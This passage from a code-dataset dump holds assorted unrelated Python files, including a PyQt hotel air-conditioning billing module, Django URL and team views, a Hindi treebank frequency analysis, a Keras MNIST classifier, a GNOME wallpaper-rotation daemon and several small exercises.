QHeaderView.ResizeToContents)\n header.setSectionResizeMode(3, QHeaderView.ResizeToContents)\n header.setSectionResizeMode(10, QHeaderView.ResizeToContents)\n header = self.ui.tbBillList.horizontalHeader()\n header.setSectionResizeMode(QHeaderView.Stretch)\n header.setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.ui.dateEdit.setDate(QDate.currentDate())\n\n self.ui.btRefresh.clicked.connect(self.slotRefTb)\n self.ui.btSettle.clicked.connect(self.slotSettle)\n self.ui.tabWidget.currentChanged.connect(self.slotChangePage)\n self.ui.dateEdit.dateChanged.connect(self.slotSelectDate)\n\n self.detailList = DetailList(self.ui, self.db)\n self.billList = BillList(self.ui, self.db)\n\n def slotSelectDate(self, date):\n self.detailList.showDetailList(date)\n self.billList.showBillList(date)\n\n def slotRefTb(self):\n self.ui.dateEdit.setDate(QDate.currentDate())\n self.detailList.showDetailList()\n self.billList.showBillList()\n\n def slotChangePage(self, idx):\n self.ui.dateEdit.setDate(QDate.currentDate())\n if idx == 0:\n self.detailList.showDetailList()\n elif idx == 1:\n self.billList.showBillList()\n\n def slotSettle(self):\n roomId, res = QInputDialog.getText(self, '请输入房间号', '房间号')\n if not res: return\n if not roomId:\n msg = '房间号不能为空'\n QMessageBox().warning(self, '房间号为空', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n isOpening, client = self.isOpening(roomId)\n if isOpening:\n msg = '当前房间空调尚未关机,是否强制关机?'\n res = QMessageBox().warning(self, '空调尚未关机', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n if res == QMessageBox.No: return\n self.disClient(client)\n self.detailList.saveDetail(client)\n if self.hasSettled(roomId):\n msg = '该房间号不存在或已结账!'\n QMessageBox().warning(self, '房间号', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n self.settleAccount(roomId)\n\n def hasSettled(self, roomId):\n sql = 'SELECT * FROM detail_list WHERE orderID = \"0\" AND roomID = ?'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return False if self.query.value(0) else True\n\n def isOpening(self, roomId):\n for client in self.server.serveQueue + self.server.waitQueue + self.server.tempQueue:\n if client.roomId == roomId:\n return True, client\n return False, None\n\n def disClient(self, client):\n client.room_temp_timer.stop()\n client.energy_timer.stop()\n client.sock.abort()\n client.closeTime = time.time()\n\n def getUserLevel(self, roomId):\n sql = 'SELECT userLevel FROM detail_list WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return self.query.value(0)\n\n def calcTotalCost(self, roomId):\n sql = 'SELECT SUM(cost) FROM detail_list WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, roomId)\n self.db.sqlExec()\n self.query.next()\n return self.query.value(0)\n\n def setOrderId(self, roomId):\n orderId = str(int(time.time()))\n sql = 'UPDATE detail_list SET orderID = ? WHERE roomID = ? AND orderID = \"0\"'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, orderId)\n self.query.bindValue(1, roomId)\n self.db.sqlExec()\n return orderId\n\n def settleAccount(self, roomId):\n userLevel = self.getUserLevel(roomId)\n cost = self.calcTotalCost(roomId)\n # start a transaction\n if self.db.dbh.transaction():\n orderId = self.setOrderId(roomId)\n self.billList.addBill(orderId, roomId, userLevel, cost)\n if not self.db.dbh.commit():\n logger.error(self.db.dbh.lastError().text())\n if not self.db.dbh.rollback():\n logger.error(self.db.dbh.lastError().text())\n msg = '结账过程出错!'\n QMessageBox().critical(self, '结账失败', msg, QMessageBox.Yes, QMessageBox.Yes)\n return\n self.bill = Bill(self.db, orderId)\n self.bill.show()\n","repo_name":"Hk4Fun/qtstudy","sub_path":"AirConditioningV2/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38146584232","text":"from django.urls import path\nfrom . import views\n\napp_name = \"users\"\n\nurlpatterns = [\n path(\"login/\", views.LoginView.as_view(), name=\"login\"),\n path(\"login/github/\", views.github_login, name=\"github_login\"),\n path(\"login/github/callback/\", views.github_callback, name=\"github_callback\"),\n path(\"login/kakao/\", views.kakao_login, name=\"kakao_login\"),\n path(\"login/kakao/callback/\", views.kakao_callback, name=\"kakao_callback\"),\n path(\"logout/\", views.logout_view, name=\"logout\"),\n path(\"signup/\", views.SignUpView.as_view(), name=\"signup\"),\n path(\n \"verify//\",\n views.complete_verification,\n name=\"complete_verification\",\n ),\n path(\"/\", views.UserProfileView.as_view(), name=\"profile\"),\n path(\"edit-profile/\", views.EditProfileView.as_view(), name=\"edit_profile\"),\n path(\"password-change/\", views.UpdatePassword.as_view(), name=\"password_change\"),\n path(\"switch-hosting/\", views.switch_hosting_mode, name=\"switch-hosting\"),\n path(\"switch-lang/\", views.switch_lang, name=\"switch-lang\"),\n]\n","repo_name":"KJYoung/airbnbV","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"8705389657","text":"# -*- coding: utf-8 -*-\nfrom io import open\n# from conllu import parse\n\nwith open(\"hindi.conllu\", 'r') as file:\n temp = file.read()\n\nfrom collections import defaultdict\nimport itertools\nfrom collections import Counter\n\n\"\"\"**Solution 1a**\"\"\"\nprint(\"----------Solution 1a------------\")\ndef freqPOSword(parseText):\n posTag = defaultdict(int)\n for sentence in parseText:\n for word in sentence:\n # posTag[(word['upos'],word['form'])] += 1\n posTag[word['upos']] += 1\n posTag = dict(sorted(posTag.items(), key=lambda item: item[1] ,reverse=True))\n # return dict(itertools.islice(posTag.items(), 50))\n return posTag\n\nparseText = parse(temp)\nposTag = freqPOSword(parseText)\nprint(posTag)\n\n\"\"\"**Solution 1b**\"\"\"\nprint(\"----------Solution 1b------------\")\ndef freq50Pos():\n freq50most = dict()\n for sentence in parseText:\n for word in sentence:\n wordlist = freq50most.get(word['upos'],[])\n wordlist.append(word['form'])\n freq50most[word['upos']] = wordlist\n\n finaldict = dict()\n for key, wordlist in freq50most.items():\n posWord = dict(Counter(wordlist))\n posWord = dict(sorted(posWord.items(), key=lambda item: item[1] ,reverse=True))\n posWord = dict(itertools.islice(posWord.items(), 50))\n finaldict[key] = posWord\n print(key, posWord)\n return finaldict\n\nfreq50mostdict = freq50Pos()\n\n\"\"\"**Solution 1c** \"\"\"\nprint(\"----------Solution 1c------------\")\ndef findfreqGender(morphfeature):\n genderfreq = defaultdict(int)\n for sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get(morphfeature,'')\n if genstr != '':\n genderfreq[genstr] += 1\n return genderfreq\n\ngenderfreq = findfreqGender('Gender')\nprint('-------Gender--------')\nfor key, value in genderfreq.items():\n print(key, value)\ngenderfreq = findfreqGender('Case')\nprint('\\n-------Case----------')\nfor key, value in genderfreq.items():\n print(key, value)\nprint('\\n-------Number--------')\ngenderfreq = findfreqGender('Number')\nfor key, value in genderfreq.items():\n print(key, value)\n\n#find freq of Gender, case, number of words \ndef genFreq(morfeature):\n genderfreq = dict()\n for sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get(morfeature,'')\n if genstr != '':\n genlist = genderfreq.get(genstr,[])\n genlist.append(word['form'])\n genderfreq[genstr] = genlist\n \n finalgenfreq = dict()\n for key, genlist in genderfreq.items():\n finalgenfreq[key] = dict(itertools.islice(dict(sorted(dict(Counter(genlist)).items(), key=lambda item: item[1] ,reverse=True)).items(),50))\n return finalgenfreq\n\ngenderfreq = genFreq('Gender')\nfor key, value in genderfreq.items():\n print(key, value)\n\ncasefreq = genFreq('Case')\nfor key, value in casefreq.items():\n print(key, value)\n\nnumberfreq = genFreq('Number')\nfor key, value in numberfreq.items():\n print(key, value)\n\n\"\"\"**Solution 1d**\"\"\"\nprint(\"----------Solution 1d------------\")\nfreq50Comb = defaultdict(int)\n\nfor sentence in parseText:\n for word in sentence:\n featdict = word.get('feats')\n if featdict != None:\n genstr = featdict.get('Gender','')\n casestr = featdict.get('Case','')\n numstr = featdict.get('Number','')\n if genstr != '' and casestr != '' and numstr != '':\n freq50Comb[(genstr, casestr, numstr)] += 1\n\nfreq50Comb = dict(sorted(dict(freq50Comb).items(), key=lambda item: item[1] ,reverse=True))\nfreq50Comb\n\n\"\"\"**Solution 1e**\"\"\"\nprint(\"----------Solution 1e------------\")\n\nheaddict = dict()\n\ndef POShead():\n headdict = dict()\n for sentence in parseText:\n for word in sentence:\n if word['misc']['ChunkType'] == 'head':\n headlist = headdict.get(word['upos'], [])\n headlist.append(word['form'])\n headdict[word['upos']] = headlist\n\n finalheaddict = dict()\n for key, headlist in headdict.items():\n headCount = dict(sorted(dict(Counter(headlist)).items(), key=lambda item: item[1] ,reverse=True))\n finalheaddict[key] = headCount\n print(key, headCount)\n return finalheaddict\n\nheaddict = POShead()\n\n\"\"\"**Solution 1f**\"\"\"\nprint(\"----------Solution 1f------------\")\n\ndef getdirectedPOS():\n directedPOS = dict()\n # def getdirectedPOS():\n for sentence in parseText:\n for word in sentence:\n if word['head'] != 0:\n mytup = (word['upos'], sentence[word['head']-1]['upos'])\n # eachlist = directedPOS.get(word['deprel'], [])\n eachlist = directedPOS.get(mytup, [])\n eachlist.append(word['deprel'])\n directedPOS[mytup] = eachlist\n\n finaldirectedPOS = dict()\n for key,eachlist in directedPOS.items():\n eachCount = dict(sorted(dict(Counter(eachlist)).items(), key=lambda item: item[1] ,reverse=True))\n finaldirectedPOS[key] = eachCount\n print(key, eachCount)\n return finaldirectedPOS\n\ndirectedPOS = getdirectedPOS()\n\n# 1.f -> part 1\nallTuples = list(directedPOS.keys())\nprint(allTuples)\n\ntotaldirectedPOS = defaultdict(int)\n\nfor key1, eachlist in directedPOS.items():\n for key2 , eachitem in eachlist.items():\n totaldirectedPOS[key1] += eachitem\n print(key1, totaldirectedPOS[key1])\n\n\"\"\"**Solution 1g**\"\"\"\nprint(\"----------Solution 1g------------\")\n\ndef dependencyR():\n directedPOS = dict()\n for sentence in parseText:\n for word in sentence:\n if word['head'] != 0:\n mytup = (word['upos'], sentence[word['head']-1]['upos'])\n eachlist = directedPOS.get(word['deprel'], [])\n eachlist.append(mytup)\n directedPOS[word['deprel']] = eachlist\n\n finaldirectedPOS = dict()\n for key,eachlist in directedPOS.items():\n eachCount = dict(sorted(dict(Counter(eachlist)).items(), key=lambda item: item[1] ,reverse=True))\n finaldirectedPOS[key] = eachCount\n print(key, eachCount)\n return finaldirectedPOS\n\ndependencyRfreq = dependencyR()\n\ndepenRtotalfreq = defaultdict(int)\n\nfor key1, eachlist in dependencyRfreq.items():\n for key2 , eachitem in eachlist.items():\n depenRtotalfreq[key1] += eachitem\n print(key1, depenRtotalfreq[key1])\n\n","repo_name":"saqeeb360/Computational-Linguistics","sub_path":"Assignment2/Q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74166080749","text":"import sys\nsys.path.insert(0, '../..')\n\nimport pyrosim\nimport math\n\nsim = pyrosim.Simulator(play_paused=True,debug=True,eval_time=5000)\n\n\n#for i in range(10):\n# segment = sim.send_cylinder(x=0,y=(-0.5-i),z=0.5, r=0,g=1,b=0,length=0.5,r1=0,r2=1,r3=0,radius=0.1,)\n\nsegment = [sim.send_cylinder(x=0,y=(0.5+i),z=0.5, r=((i+1)%2),g=(i%2),b=(i*3%2),length=.9,r1=0,r2=1,r3=0,radius=0.1) for i in range (10)]\n\njoint = [sim.send_hinge_joint(first_body_id=segment[i],second_body_id=segment[i+1],x=0,y=i+1,z=.5,n1=((i+1)%2),n2=0,n3=(i%2)) for i in range(9)]\n\nsensor = [sim.send_touch_sensor(body_id=segment[i]) for i in range(10)]\n\nsneuron = [sim.send_sensor_neuron(sensor[i]) for i in range(10)]\n\nmneuron = [sim.send_motor_neuron(joint[i]) for i in range(9)]\n\nsynapse = [sim.send_developing_synapse(sneuron[i],mneuron[i],start_weight=-10,end_weight=10,start_time=0, end_time=1) for i in range(9)]\n\nsim.start()\n","repo_name":"erichmatt/ludocrap","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40627961216","text":"class Solution:\n def addDigits(self, num: int) -> int:\n if num==0: return 0\n x=[]\n while (num):\n x.append(num%10)\n num=num//10\n ans=x[0]\n if len(x)==1:\n return int(ans)\n p=sum(x)\n return self.addDigits(p)\n ","repo_name":"ShivGamer007/ShivCodeSxLeeTcode","sub_path":"0258-add-digits/0258-add-digits.py","file_name":"0258-add-digits.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10457036955","text":"'''Calculate the sum of two numbers.\nRepeat the code to check the sum for 5 sets of numbers.\nWrite Pseudocode, draw flow chart and python code using while loop.\n'''\ncounter=1\nwhile(counter<=5):\n print(\"Set \",counter)\n n1=int(input(\"Enter the first number: \"))\n n2 = int(input(\"Enter the second number: \"))\n sum=n1+n2\n print(\"Sum of \",n1,\" and \",n2,\" is: \",sum)\n counter=counter+1\n","repo_name":"murshi-dev/PythonCodes","sub_path":"PytthonBasics/Chapter11n12Activity/FindSum5Setnumbers.py","file_name":"FindSum5Setnumbers.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3693395042","text":"import pyautogui as pag\nfrom time import sleep\n\ndef countdown():\n timer = 3\n\n while(timer != 0):\n print(timer)\n timer -= 1\n sleep(1)\n\ndef mine():\n pag.keyDown('o')\n sleep(1)\n pag.keyUp('o')\n sleep(2)\n\ncountdown()\n\n\nwhile(True):\n mine()","repo_name":"JSONCarrillo/Random-Python-Scripts","sub_path":"MC-Auto-Miner/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42958563836","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 17:27:46 2018\n\n@author: Avinash Tiwari\n\"\"\"\n\nfrom keras.datasets import mnist\nimport matplotlib. pyplot as plt\n\n# Load dataset (download if needed)\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nplt.subplot(221)\nplt.imshow(X_train[0], cmap=plt.get_cmap('gray'))\nplt.subplot(222)\nplt.imshow(X_train[1], cmap=plt.get_cmap('gray'))\nplt.subplot(223)\nplt.imshow(X_train[2], cmap=plt.get_cmap('gray'))\nplt.subplot(224)\nplt.imshow(X_train[3], cmap=plt.get_cmap('gray'))\n\nplt.show()\n\nimport numpy\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.image_data_format()\n\n# fix the seed \nseed = 7\nnumpy.random.seed(seed)\n\nX_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')\nX_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')\n\nX_train = X_train / 255\nX_test = X_test / 255\n\n# one hot encoding\n# output - [ 0 0 0 0 0 1 0 0 0 0 ]\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\n\nnum_classes = y_train.shape[1]\n\ndef baseline_model():\n model = Sequential()\n model.add(Conv2D(8, (3,3), input_shape=(1,28,28), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n \n model.add(Flatten())\n model.add(Dense(4, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n \n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n \n return model\n\n# build a model\nmodel = baseline_model()\n\n# Fit \nmodel.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3,\n batch_size=32, verbose=2)\n\nmodel.save('model.h5')\n\n# Final eval\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"CNN error: %.2f%%\" % (100 - scores[1]*100))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"AvinashTiwari/Artifical-intelligence","sub_path":"10_Docker_ml/Chap6-ML-Image/img-reco-train.py","file_name":"img-reco-train.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"70046188911","text":"# 유니버셜 함수\n# ufunc라고 불리는 유니버셜 함수는 ndarray 안에 있는 데이터 원소별로 연산을 수행하는 함수다.\nimport numpy as np\nimport matplotlib.pyplot as plt\n\narr = np.arange(10)\nprint(np.sqrt(arr))\nprint(np.exp(arr))\n\n# 단항/ 이항 유니버셜 함수가 있다.\n\n# 배열을 사용한 데이터 처리\n# 넘피 배열을 사용해서 반복문을 명시적으로 제거하는 기법을 흔히 벡터화라고 한다. 이는 순수 파이썬 연산에 비해 빠르다.\n\npoints = np.arange(-5, 5, 0.01)\nxs, ys = np.meshgrid(points, points)\n\nz = np.sqrt(xs ** 2 + ys ** 2)\nprint(z)\n\nplt.imshow(z, cmap=plt.cm.gray);\nplt.colorbar()\n\nplt.title(\"graph\")\nplt.show()\n\n# 배열 연산으로 조건절 표현하기\nxarr = np.array([1.1, 1.2, 1.3, 1.4, 1.5])\nyarr = np.array([2.1, 2.2, 2.3, 2.4, 2.5])\ncond = np.array([True, False, True, True, False])\n\n# 하기의 표현식과\nresult = [(x if c else y) for x, y, c in zip(xarr, yarr, cond)]\nprint(result)\n# 하기의 표현식은 같다.\nresult2 = np.where(cond, xarr, yarr)\nprint(result2)\n","repo_name":"JisangYou/Python","sub_path":"Samples_2019/PfDA/np3.py","file_name":"np3.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71889353069","text":"import re\nimport os\nimport json\nimport shlex\nimport random\nimport signal\nimport getpass\nimport threading\nimport subprocess\n\n\n################################################################################\n############################### Global variables ###############################\n################################################################################\n\n# System configurations\nROTATE_CMD = 'gsettings set org.gnome.desktop.background picture-uri file://%s'\nDEVNULL = open(os.devnull, 'wb')\n\n# Regex patterns\nREGEX_IMAGE = r'\\.(png|jpg|jpeg)$'\n\nwallpaper_path = None\nrotate_delay = None\nsleep_event = threading.Event()\nterminate = False\nimages = []\n\n\n################################################################################\n############################### Helper functions ###############################\n################################################################################\n\ndef interrupt_handler(sig_num, frame):\n \"\"\"Handle system signal interrupts\"\"\"\n global terminate\n if sig_num != signal.SIGUSR1:\n terminate = True\n sleep_event.set()\n\n\ndef shell_escape(cmd):\n \"\"\"Trivial shell escaping of a command\"\"\"\n return \"'\" + cmd.replace(\"'\", \"'\\\\''\") + \"'\"\n\n\ndef load_images():\n \"\"\"Reload images from source directory\"\"\"\n global images, wallpaper_path\n images = []\n for img in os.listdir(wallpaper_path):\n if re.search(REGEX_IMAGE, img, re.IGNORECASE):\n images.append(os.path.join(wallpaper_path, img))\n\n\n################################################################################\n################################# Script start #################################\n################################################################################\n\nif __name__ == \"__main__\":\n # Load the configuration file\n configs = None\n for path in [os.getcwd(), os.path.dirname(os.path.realpath(__file__))]:\n config_path = os.path.join(path, 'wallchd.json')\n if os.path.exists(config_path):\n with open(config_path) as conf_file:\n configs = json.loads(conf_file.read())\n break\n wallpaper_path = configs['wallpaper_path']\n rotate_delay = configs['rotate_delay']\n\n # Handle signals\n signal.signal(signal.SIGINT, interrupt_handler)\n signal.signal(signal.SIGTERM, interrupt_handler)\n signal.signal(signal.SIGUSR1, interrupt_handler)\n\n # Main event loop\n cycle_err = False\n while not terminate:\n if cycle_err:\n sleep_event.wait(5)\n sleep_event.clear()\n cycle_err = True\n\n # TODO(jtsai): Only reload images if the directory has been changed.\n try:\n load_images()\n except OSError:\n continue\n\n # HACK(jtsai): We need to get the DBUS_SESSION_BUS_ADDRESS in order for\n # Gnome settings command to properly work. For this hack, we pull the\n # D-Bus session from the environments of the actively running\n # gnome-session under the current user that wallchd is running under.\n SESSION_REGEX = r'/(gnome|cinnamon)-session(\\s+|$)'\n DBUS_REGEX = r'^DBUS_SESSION_BUS_ADDRESS=(.*)'\n dbus_addr = None\n for pid in [x for x in os.listdir('/proc') if x.isdigit()]:\n try:\n exe = os.path.realpath('/proc/%s/exe' % pid)\n except OSError:\n continue\n if re.search(SESSION_REGEX, exe):\n with open('/proc/%s/environ' % pid) as envs:\n for env in envs.read().split('\\0'):\n res = re.search(DBUS_REGEX, env)\n if res:\n dbus_addr = res.groups()[0]\n if dbus_addr is None:\n continue\n os.environ['DBUS_SESSION_BUS_ADDRESS'] = dbus_addr\n os.environ['DISPLAY'] = ':0'\n\n # Change the background image\n image_path = shell_escape(random.choice(images))\n cmd_str = ROTATE_CMD % image_path\n cmd = shlex.split(cmd_str)\n subprocess.Popen(cmd, stdout = DEVNULL, stderr = DEVNULL).wait()\n\n # Sleep rotation delay\n sleep_event.wait(rotate_delay)\n sleep_event.clear()\n cycle_err = False\n","repo_name":"dsnet/wallchd","sub_path":"wallchd.py","file_name":"wallchd.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10456587819","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\ndef DFS(S):\n if S > T :\n return\n if S == T :\n res.add(tuple(check))\n else :\n for i in range(K) :\n if check[i] < PN[i][1] :\n check[i] += 1\n DFS(S+PN[i][0])\n check[i] -= 1\n\nif __name__ == '__main__':\n T = int(input())\n K = int(input())\n PN = list()\n for _ in range(K) :\n p, n = map(int, input().split())\n PN.append((p,n))\n check = [0]*K\n res = set()\n DFS(0)\n print(len(res))","repo_name":"tlgus626/CodingTest","sub_path":"ch6/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15753520458","text":"import logging\nimport random\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.sites.models import Site\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q, Count\nfrom django.http import Http404, HttpResponseForbidden, HttpResponseRedirect, HttpResponse, HttpResponseBadRequest\nfrom django.shortcuts import get_object_or_404, redirect, render_to_response\nfrom django.template import RequestContext\nfrom django.utils import simplejson as json\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.generic.list_detail import object_list\n\nimport teams.moderation_const as MODERATION\nimport widget\nfrom apps.auth.models import UserLanguage, CustomUser as User\nfrom apps.videos.templatetags.paginator import paginate\nfrom messages import tasks as notifier\nfrom teams.forms import (\n CreateTeamForm, AddTeamVideoForm, EditTeamVideoForm,\n AddTeamVideosFromFeedForm, TaskAssignForm, SettingsForm, TaskCreateForm,\n PermissionsForm, WorkflowForm, InviteForm, TaskDeleteForm,\n GuidelinesMessagesForm, RenameableSettingsForm, ProjectForm, LanguagesForm,\n UnpublishForm, MoveTeamVideoForm, UploadDraftForm\n)\nfrom teams.models import (\n Team, TeamMember, Invite, Application, TeamVideo, Task, Project, Workflow,\n Setting, TeamLanguagePreference, autocreate_tasks\n)\nfrom teams.permissions import (\n can_add_video, can_assign_role, can_assign_tasks, can_create_task_subtitle,\n can_create_task_translate, can_view_tasks_tab, can_invite,\n roles_user_can_assign, can_join_team, can_edit_video, can_delete_tasks,\n can_perform_task, can_rename_team, can_change_team_settings,\n can_perform_task_for, can_delete_team, can_review, can_approve,\n can_delete_video, can_remove_video\n)\nfrom teams.search_indexes import TeamVideoLanguagesIndex\nfrom teams.signals import api_teamvideo_new, api_subtitles_rejected\nfrom teams.tasks import (\n invalidate_video_caches, invalidate_video_moderation_caches,\n update_video_moderation, update_one_team_video\n)\nfrom utils import render_to, render_to_json, DEFAULT_PROTOCOL\nfrom utils.forms import flatten_errorlists\nfrom utils.panslugify import pan_slugify\nfrom utils.searching import get_terms\nfrom utils.translation import get_language_choices, languages_with_labels\nfrom videos import metadata_manager\nfrom videos.tasks import (\n upload_subtitles_to_original_service, delete_captions_in_original_service,\n delete_captions_in_original_service_by_code\n)\nfrom videos.models import Action, VideoUrl, SubtitleLanguage, SubtitleVersion\nfrom widget.rpc import add_general_settings\nfrom widget.views import base_widget_params\n\n\nimport sentry_logger # Magical import to make Sentry's error recording happen.\nassert sentry_logger # It's okay, Pyflakes. Trust me.\nlogger = logging.getLogger(\"teams.views\")\n\n\nTASKS_ON_PAGE = getattr(settings, 'TASKS_ON_PAGE', 20)\nTEAMS_ON_PAGE = getattr(settings, 'TEAMS_ON_PAGE', 10)\nMAX_MEMBER_SEARCH_RESULTS = 40\nHIGHTLIGHTED_TEAMS_ON_PAGE = getattr(settings, 'HIGHTLIGHTED_TEAMS_ON_PAGE', 10)\nCUTTOFF_DUPLICATES_NUM_VIDEOS_ON_TEAMS = getattr(settings, 'CUTTOFF_DUPLICATES_NUM_VIDEOS_ON_TEAMS', 20)\n\nVIDEOS_ON_PAGE = getattr(settings, 'VIDEOS_ON_PAGE', 16)\nMEMBERS_ON_PAGE = getattr(settings, 'MEMBERS_ON_PAGE', 15)\nAPLICATIONS_ON_PAGE = getattr(settings, 'APLICATIONS_ON_PAGE', 15)\nACTIONS_ON_PAGE = getattr(settings, 'ACTIONS_ON_PAGE', 20)\nDEV = getattr(settings, 'DEV', False)\nDEV_OR_STAGING = DEV or getattr(settings, 'STAGING', False)\n\n\ndef index(request, my_teams=False):\n q = request.REQUEST.get('q')\n\n if my_teams and request.user.is_authenticated():\n ordering = 'name'\n qs = Team.objects.filter(members__user=request.user)\n else:\n ordering = request.GET.get('o', 'members')\n qs = Team.objects.for_user(request.user).annotate(_member_count=Count('users__pk'))\n\n if q:\n qs = qs.filter(Q(name__icontains=q)|Q(description__icontains=q))\n\n order_fields = {\n 'name': 'name',\n 'date': 'created',\n 'members': '_member_count'\n }\n order_fields_name = {\n 'name': _(u'Name'),\n 'date': _(u'Newest'),\n 'members': _(u'Most Members')\n }\n order_fields_type = {\n 'name': 'asc',\n 'date': 'desc',\n 'members': 'desc'\n }\n order_type = request.GET.get('ot', order_fields_type.get(ordering, 'desc'))\n\n if ordering in order_fields and order_type in ['asc', 'desc']:\n qs = qs.order_by(('-' if order_type == 'desc' else '')+order_fields[ordering])\n\n highlighted_ids = list(Team.objects.for_user(request.user).filter(highlight=True).values_list('id', flat=True))\n random.shuffle(highlighted_ids)\n highlighted_qs = Team.objects.filter(pk__in=highlighted_ids[:HIGHTLIGHTED_TEAMS_ON_PAGE]) \\\n .annotate(_member_count=Count('users__pk'))\n\n extra_context = {\n 'my_teams': my_teams,\n 'query': q,\n 'ordering': ordering,\n 'order_type': order_type,\n 'order_name': order_fields_name.get(ordering, 'name'),\n 'highlighted_qs': highlighted_qs,\n }\n return object_list(request, queryset=qs,\n paginate_by=TEAMS_ON_PAGE,\n template_name='teams/teams-list.html',\n template_object_name='teams',\n extra_context=extra_context)\n\n@render_to('teams/videos-list.html')\ndef detail(request, slug, project_slug=None, languages=None):\n team = Team.get(slug, request.user)\n filtered = 0\n\n if project_slug is not None:\n project = get_object_or_404(Project, team=team, slug=project_slug)\n else:\n project = None\n\n query = request.GET.get('q')\n sort = request.GET.get('sort')\n language = request.GET.get('lang')\n\n if language:\n filtered = filtered + 1\n\n if language != 'none':\n qs = team.get_videos_for_languages_haystack(\n language, user=request.user, project=project, query=query, sort=sort)\n else:\n qs = team.get_videos_for_languages_haystack(\n num_completed_langs=0, user=request.user, project=project, query=query, sort=sort)\n\n extra_context = widget.add_onsite_js_files({})\n\n extra_context['all_videos_count'] = team.get_videos_for_languages_haystack(\n None, user=request.user, project=None, query=None, sort=sort).count()\n\n extra_context.update({\n 'team': team,\n 'project':project,\n 'can_add_video': can_add_video(team, request.user, project),\n 'can_edit_videos': can_add_video(team, request.user, project),\n 'filtered': filtered\n })\n\n if extra_context['can_add_video'] or extra_context['can_edit_videos']:\n # Cheat and reduce the number of videos on the page if we're dealing with\n # someone who can edit videos in the team, for performance reasons.\n is_editor = True\n per_page = 8\n else:\n is_editor = False\n per_page = VIDEOS_ON_PAGE\n\n general_settings = {}\n add_general_settings(request, general_settings)\n extra_context['general_settings'] = json.dumps(general_settings)\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n readable_langs = TeamLanguagePreference.objects.get_readable(team)\n language_choices = [(code, name) for code, name in get_language_choices()\n if code in readable_langs]\n\n extra_context['language_choices'] = language_choices\n extra_context['query'] = query\n\n sort_names = {\n 'name': 'Name, A-Z',\n '-name': 'Name, Z-A',\n 'time': 'Time, Oldest',\n '-time': 'Time, Newest',\n 'subs': 'Subtitles, Least',\n '-subs': 'Subtitles, Most',\n }\n if sort:\n extra_context['order_name'] = sort_names[sort]\n else:\n extra_context['order_name'] = sort_names['-time']\n\n extra_context['current_videos_count'] = qs.count()\n extra_context['filtered'] = filtered\n\n team_video_md_list, 